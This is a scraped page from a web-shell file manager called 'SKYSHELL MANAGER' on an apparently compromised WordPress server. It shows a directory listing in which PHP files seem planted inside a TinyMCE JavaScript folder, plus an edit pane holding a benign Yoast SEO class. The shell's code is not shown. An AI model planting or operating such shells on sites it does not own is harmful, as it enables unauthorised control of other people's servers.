📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: wrapper.php
<?php /** * Yoast SEO Plugin File. * * @package Yoast\YoastSEO\WordPress */ namespace Yoast\WP\Free\WordPress; /** * Wrapper class for WordPress globals. * This consists of factory functions to inject WP globals into the dependency container. */ class Wrapper { /** * Wrapper method for returning the wpdb object for use in dependency injection. * * @return \wpdb The wpdb global. */ public static function get_wpdb() { global $wpdb; return $wpdb; } /** * Wrapper method for returning the wp_query object for use in dependency injection. * * @return \WP_Query The wp_query global. */ public static function get_wp_query() { global $wp_query; return $wp_query; } }
Save